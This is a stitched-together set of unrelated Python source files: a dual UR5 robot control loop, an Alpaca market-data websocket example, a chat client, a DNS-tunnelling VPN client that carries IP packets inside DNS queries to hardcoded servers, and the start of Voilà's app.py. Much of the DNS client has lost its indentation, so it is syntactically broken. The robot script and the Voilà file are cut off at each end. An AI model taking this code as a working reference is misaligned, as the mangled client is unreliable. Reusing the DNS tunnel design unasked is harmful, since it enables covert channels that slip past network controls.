    setp_names, setp_types = conf.get_recipe('setp')
    watchdog_names, watchdog_types = conf.get_recipe('watchdog')
    con1 = rtde.RTDE(args.host, args.port)
    con2 = rtde.RTDE('192.168.0.98', 30004)
    con1.connect()
    con2.connect()
    # get controller version
    con1.get_controller_version()
    con2.get_controller_version()
    con1.send_output_setup(output_names, output_types)
    setp1 = con1.send_input_setup(setp_names, setp_types)
    watchdog1 = con1.send_input_setup(watchdog_names, watchdog_types)
    con2.send_output_setup(output_names, output_types)
    setp2 = con2.send_input_setup(setp_names, setp_types)
    watchdog2 = con2.send_input_setup(watchdog_names, watchdog_types)
    print(setp_names)
    # setup recipes
    # if not con.send_output_setup(output_names, output_types, frequency = args.frequency):
    #     logging.error('Unable to configure output')
    #     sys.exit()
    #start data synchronization
    # if not con.send_start():
    #     logging.error('Unable to start synchronization')
    #     sys.exit()
    # fig = plot.figure(1)
    # ax = fig.gca(projection='3d')
    # ax.plot(trajectoryUR51.database[:,0],trajectoryUR51.database[:,1],trajectoryUR51.database[:,2])
    # fig = plot.figure(2)
    # ax = fig.gca(projection='3d')
    # ax.plot(trajectoryUR52.database[:,0],trajectoryUR52.database[:,1],trajectoryUR52.database[:,2])
    # plot.show()
    # exit()
    # Zero all command registers before the run; register 6 is used below as
    # a "command valid" flag.
    setp1.input_double_register_0 = 0
    setp1.input_double_register_1 = 0
    setp1.input_double_register_2 = 0
    setp1.input_double_register_3 = 0
    setp1.input_double_register_4 = 0
    setp1.input_double_register_5 = 0
    setp1.input_double_register_6 = 0
    watchdog1.input_int_register_0 = 0
    setp2.input_double_register_0 = 0
    setp2.input_double_register_1 = 0
    setp2.input_double_register_2 = 0
    setp2.input_double_register_3 = 0
    setp2.input_double_register_4 = 0
    setp2.input_double_register_5 = 0
    setp2.input_double_register_6 = 0
    watchdog2.input_int_register_0 = 0
    # con2.disconnect()
    # con2.connect()
    # con2.get_controller_version()
    # con2.send_output_setup(output_names, output_types)
    # setp2 = con2.send_input_setup(setp_names, setp_types)
    # setp2.input_double_register_0 = 0
    # setp2.input_double_register_1 = 0
    # setp2.input_double_register_2 = 0
    # setp2.input_double_register_3 = 0
    # setp2.input_double_register_4 = 0
    # setp2.input_double_register_5 = 0
    # setp2.input_double_register_6 = 0
    print(ur5_1.getPosition())
    print(ur5_1.getJointPosition())
    print(trajectoryUR51.database[0,:])
    print(trajectorySpeed_1[0,:])
    if not con1.send_output_setup(output_names, output_types, frequency = args.frequency):
        logging.error('Unable to configure output')
        sys.exit()
    #start data synchronization
    if not con1.send_start():
        logging.error('Unable to start synchronization')
        sys.exit()
    if not con2.send_output_setup(output_names, output_types, frequency = args.frequency):
        logging.error('Unable to configure output')
        sys.exit()
    #start data synchronization
    if not con2.send_start():
        logging.error('Unable to start synchronization')
        sys.exit()
    timeInit = time.perf_counter()
    con1.send(setp1)
    con2.send(setp2)
    input('RTDE configurado, pressione enter')
    # s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # s1.connect((HOST1, PORT))
    # s1.setsockopt(socket.IPPROTO_TCP, socket.TCP_QUICKACK, 1)
    auxiliar = True
    # Main control loop: one RTDE cycle per trajectory step.
    while(count < countMax):
        # dataUR51 = getData(s1)
        # dataUR52 = getData(s2)
        t1 = time.perf_counter()
        state1 = con1.receive()
        state2 = con2.receive()
        ur5_1.setRobotDataRTDE(state1)
        ur5_2.setRobotDataRTDE(state2)
        # ur5_1.setRobotData(dataUR51)
        # ur5_2.setRobotData(dataUR52)
        #tcp_pose = np.asarray(state.target_TCP_pose)
        # print(tcp_pose)
        # print("\n")
        #print(ur5_1.getPosition())
        # Choose your control law:
        #jointControl = ur5.controlLoopInverse(trajectory.database[count,:])
        #jointControl = ur5.controlLoopPseudoInverse(trajectory.database[count,:])
        jointControl_1 = ur5_1.controlLoopDLS(trajectoryUR51.database[count,:], cartesianSpeedReference = trajectorySpeed_1[count,:])
        jointControl_2 = ur5_2.controlLoopDLS(trajectoryUR52.database[count,:], cartesianSpeedReference = trajectorySpeed_2[count,:])
        # jointControl = ur5.controlLoopDLS(target)
        #jointControl = ur5.speedTransform(desiredSpeed)
        #jointControl = np.array([0, 0, 0, 0, 0, 0.1])
        if (auxiliar == True):
            # Log robot time, joints, speeds, poses and forces for this step.
            # timeListRobot_1.append(state.timestamp)
            # speedList_1.append(state.target_qd)
            # poseListUR5_1.append(state.target_TCP_pose)
            # speedCalculatedListUR5_1.append(jointControl_1)
            #poseListUR5_2.append(poseUR5_2)
            timeListRobot_1.append(ur5_1.getTime()-timeInitRobot_1)
            timeListRobot_2.append(ur5_2.getTime()-timeInitRobot_2)
            jointList_1.append(ur5_1.getJointPosition())
            jointList_2.append(ur5_2.getJointPosition())
            speedList_1.append(ur5_1.getJointSpeedTarget())
            speedList_2.append(ur5_2.getJointSpeedTarget())
            #jointPositionList.append(ur5.getJointPositionTarget())
            poseUR5_1 = ur5_1.getPosition()
            poseUR5_2 = ur5_2.getPosition()
            poseUR5_1[3:6] = tf.rotationVector2RollPitchYaw(poseUR5_1[3:6])
            poseUR5_2[3:6] = tf.rotationVector2RollPitchYaw(poseUR5_2[3:6])
            poseListUR5_1.append(poseUR5_1)
            poseListUR5_2.append(poseUR5_2)
            poseSpeedListUR5_1.append(ur5_1.getTCPSpeedTarget())
            poseSpeedListUR5_2.append(ur5_2.getTCPSpeedTarget())
            speedCalculatedListUR5_1.append(jointControl_1)
            speedCalculatedListUR5_2.append(jointControl_2)
            TCPForceList_UR5_1.append(ur5_1.getTCPForce())
            TCPForceList_UR5_2.append(ur5_2.getTCPForce())
        else:
            # Hold off logging until robot 1 actually starts moving.
            if (norm(ur5_1.getJointSpeedTarget()) > 0):
                auxiliar = True
        count = count + 1
        # Write commanded joint speeds to both robots' input registers;
        # register 6 = 1 marks the command as valid.
        setp1.__dict__["input_double_register_0"] = jointControl_1[0]
        setp1.__dict__["input_double_register_1"] = jointControl_1[1]
        setp1.__dict__["input_double_register_2"] = jointControl_1[2]
        setp1.__dict__["input_double_register_3"] = jointControl_1[3]
        setp1.__dict__["input_double_register_4"] = jointControl_1[4]
        setp1.__dict__["input_double_register_5"] = jointControl_1[5]
        setp1.__dict__["input_double_register_6"] = 1
        con1.send(setp1)
        con1.send(watchdog1)
        setp2.__dict__["input_double_register_0"] = jointControl_2[0]
        setp2.__dict__["input_double_register_1"] = jointControl_2[1]
        setp2.__dict__["input_double_register_2"] = jointControl_2[2]
        setp2.__dict__["input_double_register_3"] = jointControl_2[3]
        setp2.__dict__["input_double_register_4"] = jointControl_2[4]
        setp2.__dict__["input_double_register_5"] = jointControl_2[5]
        setp2.__dict__["input_double_register_6"] = 1
        con2.send(setp2)
        con2.send(watchdog2)
        #speedJ(s1, jointControl_1)
        #speedJ(s2, jointControl_2)
        t2 = time.perf_counter()
        timeListPerStep.append(t2 - t1)
        timeList.append(t2-timeInit)
        #print(t2 - t1)
    # Zero the registers and clear the command flag to stop both robots.
    setp1.__dict__["input_double_register_0"] = 0
    setp1.__dict__["input_double_register_1"] = 0
    setp1.__dict__["input_double_register_2"] = 0
    setp1.__dict__["input_double_register_3"] = 0
    setp1.__dict__["input_double_register_4"] = 0
    setp1.__dict__["input_double_register_5"] = 0
    setp1.__dict__["input_double_register_6"] = 0
    con1.send(setp1)
    con1.send(watchdog1)
    setp2.__dict__["input_double_register_0"] = 0
    setp2.__dict__["input_double_register_1"] = 0
    setp2.__dict__["input_double_register_2"] = 0
    setp2.__dict__["input_double_register_3"] = 0
    setp2.__dict__["input_double_register_4"] = 0
    setp2.__dict__["input_double_register_5"] = 0
    setp2.__dict__["input_double_register_6"] = 0
    con2.send(setp2)
    con2.send(watchdog2)
    print("FOI: " + str(count))
    # print(timeListRobot_1)
    # print("\n\n\n\n\n\n")
    # print(speedList_1)
    # print("\n\n\n\n\n\n")
    # print(poseListUR5_1)
    # exit()
    # s1.close()
    # s2.close()
    # Post-processing: convert logs to arrays and compute error norms.
    errorArray_1 = np.asarray(ur5_1.errorDB, dtype=np.float32)
    errorArray_2 = np.asarray(ur5_2.errorDB, dtype=np.float32)
    #np.save("/home/nascimento/Projects/MESTRADO - Task Space Control/generatedPaths/UR5/Error", errorArray)
    timeArray_1 = np.asarray(timeListRobot_1, dtype=np.float32)
    timeArray_2 = np.asarray(timeListRobot_2, dtype=np.float32)
    normErrorPosition_1 = []
    normErrorRotation_1 = []
    normErrorPosition_2 = []
    normErrorRotation_2 = []
    speedListArray_1 = np.asarray(speedList_1, dtype=np.float32)
    speedListArray_2 = np.asarray(speedList_2, dtype=np.float32)
    speedCalculatedListArrayUR5_1 = np.asarray(speedCalculatedListUR5_1, dtype=np.float32)
    speedCalculatedListArrayUR5_2 = np.asarray(speedCalculatedListUR5_2, dtype=np.float32)
    poseListArrayUR5_1 = np.asarray(poseListUR5_1, dtype = np.float32)
    poseListArrayUR5_2 = np.asarray(poseListUR5_2, dtype = np.float32)
    TCPForceArrayUR5_1 = np.asarray(TCPForceList_UR5_1, dtype = np.float32)
    TCPForceArrayUR5_2 = np.asarray(TCPForceList_UR5_2, dtype = np.float32)
    poseSpeedArrayUR5_1 = np.asarray(poseSpeedListUR5_1, dtype = np.float32)
    poseSpeedArrayUR5_2 = np.asarray(poseSpeedListUR5_2, dtype = np.float32)
    jointArray_1 = np.asarray(jointList_1, dtype = np.float32)
    jointArray_2 = np.asarray(jointList_2, dtype = np.float32)
    #jointPositionListArray = np.asarray(jointPositionList, dtype=np.float32)
    # Keep only the tail of the error DB that lines up with the logged
    # samples (errors may have been recorded before logging started).
    for i in range(np.shape(errorArray_1)[0] - np.shape(timeArray_1)[0],np.shape(errorArray_1)[0]):
        normErrorPosition_1.append(norm(errorArray_1[i,0:3]))
        normErrorRotation_1.append(norm(errorArray_1[i,3:6]))
    for i in range(np.shape(errorArray_2)[0] - np.shape(timeArray_2)[0],np.shape(errorArray_2)[0]):
        normErrorPosition_2.append(norm(errorArray_2[i,0:3]))
        normErrorRotation_2.append(norm(errorArray_2[i,3:6]))
    # for i in range(0,np.shape(speedListArray)[0]):
    #     print (speedListArray[i,:])
    normErrorPositionArray_1 = np.asarray(normErrorPosition_1, dtype = np.float32)
    normErrorRotationArray_1 = np.asarray(normErrorRotation_1, dtype = np.float32)
    normErrorPositionArray_2 = np.asarray(normErrorPosition_2, dtype = np.float32)
    normErrorRotationArray_2 = np.asarray(normErrorRotation_2, dtype = np.float32)
    wDBarray_1 = np.asarray(ur5_1.wDB, dtype = np.float32)
    wDBarray_2 = np.asarray(ur5_2.wDB, dtype = np.float32)
    print("Lost steps are: " + str(lostTime))
    # Save every log to a MATLAB file for offline analysis.
    mdict = {'normErrorPosition_UR5_1': normErrorPosition_1, 'normErrorPosition_UR5_2': normErrorPosition_2,
        'normErrorRotation_UR5_1':normErrorRotation_1,'normErrorRotation_UR5_2':normErrorRotation_2, 'expTime_1':timeArray_1,'expTime_2':timeArray_2,'speedListJointArray_UR5_1':speedListArray_1,
        'speedListJointArray_UR5_2':speedListArray_2, 'speedCalculatedListJointArray_UR5_1':speedCalculatedListArrayUR5_1,'speedCalculatedListJointArray_UR5_2':speedCalculatedListArrayUR5_2,
        'wDBarray_UR5_1':wDBarray_1, 'wDBarray_UR5_2':wDBarray_2, 'PoseArray_UR5_1':poseListArrayUR5_1, 'PoseArray_UR5_2':poseListArrayUR5_2, 'TCPForceArray_1':TCPForceArrayUR5_1, 'TCPForceArray_2':TCPForceArrayUR5_2,
        'poseSpeedArray_1':poseSpeedArrayUR5_1, 'poseSpeedArray_2':poseSpeedArrayUR5_2, 'jointArray_1':jointArray_1, 'jointArray_2':jointArray_2,'TrajectoryUR51Database':trajectoryUR51.database,'TrajectoryUR52Database':trajectoryUR52.database}
    savemat('DualBox_10',mdict)
    # for i in range(0,len(timeListPerStep)):
    #     print(timeListPerStep[i])
    plot.figure(1)
    plot.plot(timeArray_1,normErrorPositionArray_1)
    plot.xlabel("Tempo(s)")
    plot.ylabel("Erro(m)")
    plot.suptitle("UR5 1 - Erro absoluto - Posicao")
    plot.figure(2)
    plot.plot(timeArray_2,normErrorPositionArray_2)
    plot.xlabel("Tempo(s)")
    plot.ylabel("Erro(m)")
    plot.suptitle("UR5 2 - Erro absoluto - Posicao")
    # plot.figure(2)
    # plot.plot(timeArray,speedListArray[:,0], color = "red", label="Velocidade Real")
    # plot.plot(timeArray,speedCalculatedListArray[:,0], color = "blue", label="Velocidade Calculada")
    # plot.xlabel("Tempo(s)")
    # plot.ylabel("Velocidade(rad/s)")
    # plot.suptitle("Velocidade - Junta 1")
    # plot.legend(loc='upper left')
    # plot.figure(3)
    # plot.plot(timeArray,speedListArray[:,1], color = "red", label="Velocidade Real")
    # plot.plot(timeArray,speedCalculatedListArray[:,1], color = "blue", label="Velocidade Calculada")
    # plot.xlabel("Tempo(s)")
    # plot.ylabel("Velocidade(rad/s)")
    # plot.suptitle("Velocidade - Junta 2")
    # plot.legend(loc='upper left')
    # plot.figure(4)
    # plot.plot(timeArray,speedListArray[:,2], color = "red", label="Velocidade Real")
    # plot.plot(timeArray,speedCalculatedListArray[:,2], color = "blue", label="Velocidade Calculada")
    # plot.xlabel("Tempo(s)")
    # plot.ylabel("Velocidade(rad/s)")
    # plot.suptitle("Velocidade - Junta 3")
    # plot.legend(loc='upper left')
    # plot.figure(5)
    # plot.plot(timeArray,speedListArray[:,3], color = "red", label="Velocidade Real")
    # plot.plot(timeArray,speedCalculatedListArray[:,3], color = "blue", label="Velocidade Calculada")
    # plot.xlabel("Tempo(s)")
    # plot.ylabel("Velocidade(rad/s)")
    # plot.suptitle("Velocidade - Junta 4")
    # plot.legend(loc='upper left')
    # plot.figure(6)
    # plot.plot(timeArray,speedListArray[:,4], color = "red", label="Velocidade Real")
    # plot.plot(timeArray,speedCalculatedListArray[:,4], color = "blue", label="Velocidade Calculada")
    # plot.xlabel("Tempo(s)")
    # plot.ylabel("Velocidade(rad/s)")
    # plot.suptitle("Velocidade - Junta 5")
    # plot.legend(loc='upper left')
    # plot.figure(7)
    # plot.plot(timeArray,speedListArray[:,5], color = "red", label="Velocidade Real")
    # plot.plot(timeArray,speedCalculatedListArray[:,5], color = "blue", label="Velocidade Calculada")
    # plot.xlabel("Tempo(s)")
    # plot.ylabel("Velocidade(rad/s)")
    # plot.suptitle("Velocidade - Junta 6")
    # plot.legend(loc='upper left')
    plot.figure(3)
    plot.plot(timeArray_1,normErrorRotationArray_1)
    plot.xlabel("Tempo(s)")
    plot.ylabel("Erro(rad)")
    plot.suptitle("UR5 1 - Erro absoluto - Rotacao")
    plot.figure(4)
    plot.plot(timeArray_2,normErrorRotationArray_2)
    plot.xlabel("Tempo(s)")
    plot.ylabel("Erro(rad)")
    plot.suptitle("UR5 2 - Erro absoluto - Rotacao")
    # plot.figure(9)
    # plot.plot(timeArray,wDBarray)
    # plot.xlabel("Tempo(s)")
    # plot.ylabel("Distância de Singularidade")
    # plot.suptitle("Análise de Singularidade")
    plot.show()
    # fig = plot.figure(5)
    # ax = fig.gca(projection='3d')
    # ax.plot(poseListArrayUR5_1[:,0],poseListArrayUR5_1[:,1],poseListArrayUR5_1[:,2])
    # plot.xlabel("X")
    # plot.ylabel("Y")
    # plot.zlabel("Z")
    # plot.suptitle("Trajetória - UR5 1")
    # 3-D comparison of executed vs. reference trajectories for both robots.
    fig = plot.figure(5)
    ax = fig.gca(projection='3d')
    ax.plot(poseListArrayUR5_1[:,0],poseListArrayUR5_1[:,1], poseListArrayUR5_1[:,2],color = "red", label="Trajetória Real - UR5-1")
    ax.plot(trajectoryUR51.database[:,0],trajectoryUR51.database[:,1],trajectoryUR51.database[:,2],color = "blue", label="Trajetória Calculada - UR5-1")
    ax.set_xlabel("X")
    ax.set_ylabel("Y")
    ax.set_zlabel("Z")
    fig2 = plot.figure(6)
    ax2 = fig2.gca(projection='3d')
    ax2.plot(poseListArrayUR5_2[:,0],poseListArrayUR5_2[:,1], poseListArrayUR5_2[:,2],color = "red", label="Trajetória Real - UR5-2")
    ax2.plot(trajectoryUR52.database[:,0],trajectoryUR52.database[:,1],trajectoryUR52.database[:,2],color = "blue", label="Trajetória Calculada - UR5-2")
    ax2.set_xlabel("X")
    ax2.set_ylabel("Y")
    ax2.set_zlabel("Z")
    ax.legend()
    #plot.suptitle("Trajetória - UR5 2")
    plot.show()
main(sys.argv) |
dynamic_subscription_example.py | """
In this example code we will show a pattern that allows a user to change
the websocket subscriptions as they please.
"""
import logging
import threading
import asyncio
import time
from alpaca_trade_api import StreamConn
from alpaca_trade_api.common import URL
ALPACA_API_KEY = "<YOUR-API-KEY>"
ALPACA_SECRET_KEY = "<YOUR-SECRET-KEY>"
USE_POLYGON = False
conn: StreamConn = None
def consumer_thread():
    """Run the Alpaca websocket consumer on this (background) thread.

    Ensures the thread has an asyncio event loop, enables loop debug mode,
    builds the module-global StreamConn, registers the stream handlers and
    blocks inside ``conn.run()``.
    """
    # A non-main thread has no event loop by default; create and install one.
    try:
        loop = asyncio.get_event_loop()
    except RuntimeError:
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
    # Bug fix: enable debug on whichever loop we ended up with. Previously
    # set_debug(True) was only reached when a loop already existed, so a
    # freshly created loop (the usual case in a worker thread) never got it.
    loop.set_debug(True)

    global conn
    conn = StreamConn(
        ALPACA_API_KEY,
        ALPACA_SECRET_KEY,
        base_url=URL('https://paper-api.alpaca.markets'),
        data_url=URL('https://data.alpaca.markets'),
        # data_url=URL('http://127.0.0.1:8765'),
        data_stream='polygon' if USE_POLYGON else 'alpacadatav1'
    )

    @conn.on(r'^AM\..+$')
    async def on_minute_bars(conn, channel, bar):
        print('bars', bar)

    @conn.on(r'Q\..+')
    async def on_quotes(conn, channel, quote):
        print('quote', quote)

    @conn.on(r'T\..+')
    async def on_trades(conn, channel, trade):
        print('trade', trade)

    # Blocks forever, servicing the websocket with an initial subscription.
    conn.run(['alpacadatav1/Q.GOOG'])
if __name__ == '__main__':
    logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
    # Run the websocket consumer in the background; this main thread only
    # drives subscription changes through the shared `conn` object.
    threading.Thread(target=consumer_thread).start()
    loop = asyncio.get_event_loop()
    time.sleep(5)  # give the initial connection time to be established
    subscriptions = [['alpacadatav1/AM.TSLA'], ['alpacadatav1/Q.GOOG'],
                     ['alpacadatav1/T.AAPL']]
    # Cycle through the subscription sets forever, giving each enough time
    # to observe data before switching.
    while 1:
        for channels in subscriptions:
            loop.run_until_complete(conn.subscribe(channels))
            if "AM." in channels[0]:
                time.sleep(60)  # aggs are once every minute. give it time
            else:
                time.sleep(20)
client.py | import socket
import threading
def receive():
    """Background loop: read server messages, answer the NICK handshake,
    and print incoming chat lines.

    Uses the module-global `client` socket created in the __main__ block.
    Exits (and closes the socket) when the server disconnects or a network
    error occurs.
    """
    while True:
        try:
            message = client.recv(1024).decode("ascii")
            if message == 'NICK':
                # Server asks for our nickname once at connect time.
                nickname = input("Choose a nickname: ")
                client.send(nickname.encode("ascii"))
                print(client.recv(1024).decode("ascii"))
            elif message != "":
                print(message)
            else:
                # recv() returning '' means the server closed the connection.
                print("Server Error")
                client.close()
                break
        except (OSError, UnicodeDecodeError):
            # Bug fix: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit and hid real bugs. Only socket
            # and decoding failures are treated as network errors now.
            print("Network Error")
            client.close()
            break
def write():
    """Read lines from stdin forever and forward each one to the server
    through the module-global `client` socket."""
    while True:
        client.send(input('').encode("ascii"))
if __name__ == '__main__':
    # Connect to the chat server (fixed port 5400), then run the reader and
    # writer loops on separate threads so receiving never blocks typing.
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((input("IP Server: "), 5400))
    receive_thread = threading.Thread(target=receive)
    receive_thread.start()
    write_thread = threading.Thread(target=write)
    write_thread.start()
client.py | # -*- coding: utf-8 -*-
'''
Test client:
- maintains the TUN device
- listens for incoming data
- rewrites packets
'''
import logging
import time
import os
import socket
import uuid as UUID_GENERATOR
from threading import Thread
from select import select
from core.dns_handler import Decapsulator, Encapsulator
from core.sys_manage import TunManager
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(filename)s[:%(lineno)d] %(levelname)s %(message)s',
                    datefmt='%H:%M:%S')
UUID = '779ea091-ad7d-43bf-8afc-8b94fdb576bf'  # static client identity sent at login
MTU = 180            # tunnel MTU (payload must fit inside a DNS message)
BUFFER_SIZE = 4096
KEEPALIVE = 10       # seconds between heartbeat polls in __keep_alive
DOMAIN_NS_IP = '120.78.166.34'
# NOTE(review): DOMAIN_NS_ADDR is referenced by Client's methods but is not
# defined in this module's visible code — presumably (DOMAIN_NS_IP, 53);
# confirm where it is defined.
HOST_NAME = 'group11.cs305.fun'
# HOST_NAME = 'www.ibbb.top'
TUNSETIFF = 0x400454ca
IFF_TUN = 0x0001
IFF_TAP = 0x0002
LOGIN_MSG = b'LOGIN'  # user login message: USER_UUID.LOGIN.hostname.domain
DOWN_MSG = b'DOWN'    # downstream poll: SESSION_UUID.DOWN.hostname.domain
UP_MSG = b'UP'        # upstream data: SESSION_UUID.UP.$BYTE_DATA.hostname.domain
CLOSED_SESSION_MSG = b'CLOSED_SESSION_MSG'
MAX_KEEP_ASK = 1      # cap for the keep_ask polling counter
class SessionExpiredException(Exception):
    '''
    Exception raised when the client detects it has been logged out.
    '''
class Client():
'''
代理客户端
'''
    def __init__(self):
        '''
        Initialize the proxy client:
        - heartbeat management (currently disabled, see commented call below)
        - routine polling counter, keep_ask
        '''
        # Single UDP socket for all DNS-tunnel traffic; 5 s receive timeout.
        self.__socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.__socket.settimeout(5)
        self.init_local_ip()
        self.s_uuid = None  # UUID for session (assigned on successful login)
        self.readables = [self.__socket]
        self.tun_fd = None  # TUN device fd, created by __decode_login_msg
        # self.__keep_alive()
        self.keep_ask = MAX_KEEP_ASK
def init_local_ip(self):
'''
获取本机ip
'''
_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
_socket.connect(('8.8.8.8', 80))
self.local_ip = _socket.getsockname()[0]
logging.info('Local IP: %s', self.local_ip)
_socket.close()
def __keep_alive(self):
'''
子线程保持向服务端发送心跳包,以防止服务端清除会话断开隧道连接
'''
def _keepalive():
while True:
time.sleep(KEEPALIVE)
self.__request_down_msg()
c_t_1 = Thread(target=_keepalive, args=(), name='keep_alive')
c_t_1.setDaemon(True)
c_t_1.start()
def __keep_ask(self, keep: bool):
'''
keep_ask:
- 每次发包后置为10
- 每次收到空包-1
- 收包后+1
- 上限为10
'''
if keep and self.keep_ask < MAX_KEEP_ASK:
self.keep_ask += 1
elif not keep and self.keep_ask > 0:
self.keep_ask -= 1
def __handle_login(self):
'''
连接服务端并配置代理隧道\n
创建Tunfd\n
用户登录消息 USER_UUID.LOGIN.hostname.domain
持续登录,失败后等待3秒,知道登录为止
'''
request = Encapsulator.make_fake_request(UUID, LOGIN_MSG, HOST_NAME)
while True:
self.__socket.sendto(request, DOMAIN_NS_ADDR)
logging.info('Send data in DNS request')
response, _addr = self.__socket.recvfrom(2048)
try:
if self.__decode_login_msg(response):
break
except AssertionError:
logging.info('Server Down or Not Detected Login Message')
continue
logging.info('Login Failed, Try later')
time.sleep(3)
logging.info('Connect to server successful')
def __request_up_msg(self, data: bytes):
'''
请求用户上行数据 SESSION_UUID.<UNIQUE_ID>.UP.$BYTE_DATA.hostname.domain
'''
s_uuid = self.s_uuid+'.UP.'+ str(UUID_GENERATOR.uuid1())[:8]
request = Encapsulator.make_fake_request(s_uuid, data, HOST_NAME)
self.__socket.sendto(request, DOMAIN_NS_ADDR)
logging.info('Send data in DNS request')
logging.debug(request)
self.__keep_ask(True)
def __request_down_msg(self):
'''
请求用户下行数据 SESSION_UUID.DOWN.<RANDOM_UUID>.hostname.domain
'''
time.sleep(0.01)
d_uuid = self.s_uuid+'.DOWN'
r_uuid = str(UUID_GENERATOR.uuid1())
request = Encapsulator.make_fake_request(d_uuid, r_uuid.encode(), HOST_NAME)
self.__socket.sendto(request, DOMAIN_NS_ADDR)
logging.info('Send DOWN MSG in DNS request %s', r_uuid)
logging.info(request)
@staticmethod
def __decode_down_msg(response):
'''
解析用户下行数据
'''
rdata = Decapsulator.get_txt_record(response)
if len(rdata) < 1:
logging.debug('No TXT record in response')
return b''
return rdata
def __decode_login_msg(self, response):
'''
解析用户登录响应
'''
name_data = Decapsulator.get_host_name(response)
if name_data[1] != LOGIN_MSG:
logging.debug('Not a Login response <%s>', name_data[1])
return False
try:
txt_record = Decapsulator.get_txt_record(response)
txt_record = txt_record.decode()
except UnicodeDecodeError:
logging.error('Wrong Login response: %s', txt_record)
time.sleep(1)
return False
self.tun_fd, tun_name = TunManager.create_tunnel()
self.readables.append(self.tun_fd)
_login_response = txt_record.split(';')
if len(_login_response) != 3:
logging.debug('Not a Login response <%s>', txt_record)
return False
self.s_uuid, local_ip, peer_ip = _login_response
logging.info('Session UUID: %s \tLocal ip: %s\tPeer ip: %s', self.s_uuid, local_ip, peer_ip)
TunManager.start_tunnel(tun_name, local_ip, peer_ip, MTU)
logging.info('Create Tun Successfully! Tun ID = %d', self.tun_fd)
return True
def __handle_dns_response(self, response):
'''
处理UDP客户端接受的
'''
name_data = Decapsulator.get_host_name(response)
if name_data[1] == LOGIN_MSG: # b'LOGIN':
logging.error('Ignore Server Response: Already Login')
return
if name_data[1] == DOWN_MSG: # b'DOWN':
logging.debug('Receive Packet from server %s', name_data[2][:8])
bytes_write = self.__decode_down_msg(response)
if bytes_write == CLOSED_SESSION_MSG:
# 重新登录
# - 关闭旧的session, 原地发起登录请求
logging.info('客户端掉线,重新登录')
# - 删除旧的文件描述符
os.close(self.readables[1])
self.readables = [self.__socket]
raise SessionExpiredException
if bytes_write is not None and len(bytes_write) > 20:
# Check if IPPacket
# logging.info(IPPacket.str_info(bytes_write))
logging.debug('Write data into TUN')
logging.info(bytes_write)
os.write(self.tun_fd, bytes_write)
# 收到数据包后+1
self.__keep_ask(True)
else:
# 收到空包后-1
self.__keep_ask(False)
return
if name_data[1] == UP_MSG: # b'UP'
logging.debug('Server Response Invalid Question')
return
def __handle_forwarding(self):
'''
客户端登录后的转发行为
'''
while True:
readable_fd = select(self.readables, [], [], 10)[0]
for _fd in readable_fd:
if _fd == self.__socket:
response, _addr = self.__socket.recvfrom(2048)
self.__handle_dns_response(response)
else:
# 将从Tun拿到的IP包发送给代理服务器
ip_packet = os.read(self.tun_fd, BUFFER_SIZE)
logging.debug('Get outbounding data from TUN')
self.__request_up_msg(ip_packet)
# 发送心跳包,尝试接受数据
logging.debug('keep_ask = [%d]', self.keep_ask)
if self.keep_ask > 0:
logging.info('Try To Receive Data [%d]', self.keep_ask)
self.__request_down_msg()
def run_forever(self):
'''
运行代理客户端
'''
logging.info('Start connect to server...')
self.__handle_login()
while True:
try:
self.__handle_forwarding()
except SessionExpiredException:
logging.error('SessionExpiredException')
self.__handle_login()
continue
except KeyboardInterrupt:
# TODO: close the connection
raise KeyboardInterrupt
if __name__ == '__main__':
    # NOTE(review): DOMAIN_NS_ADDR is assigned twice below; only the last
    # uncommented assignment takes effect — the first line is a dead
    # leftover of the server-address toggles kept in the comments.
    DOMAIN_NS_ADDR = ('120.78.166.34', 53)
    # DOMAIN_NS_ADDR = ('8.8.8.8', 53)
    DOMAIN_NS_ADDR = ('18.162.114.192', 53)
    # DOMAIN_NS_ADDR = ('18.162.51.192', 53) # 29 Kbps => 140kbps
    try:
        Client().run_forever()
    except KeyboardInterrupt:
        logging.info('Closing vpn client ...')
|
app.py | #############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyterlab_server.themes_handler import ThemesHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
from .shutdown_kernel_handler import VoilaShutdownKernelHandler
from .voila_kernel_manager import voila_kernel_manager_factory
from .query_parameters_handler import QueryStringSocketHandler
from .utils import create_include_assets_functions
# Regex capturing a Jupyter kernel id (five dash-separated word-char groups).
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"


def _(x):
    """Gettext-style marker function: returns its argument unchanged."""
    return x
class Voila(Application):
    """Stand-alone tornado application that serves notebooks rendered read-only."""

    name = 'voila'
    version = __version__
    examples = 'voila example.ipynb --port 8888'

    # Command-line flags mapping to traitlets configuration.
    flags = {
        'debug': (
            {
                'Voila': {'log_level': logging.DEBUG},
                'VoilaConfiguration': {'show_tracebacks': True},
            },
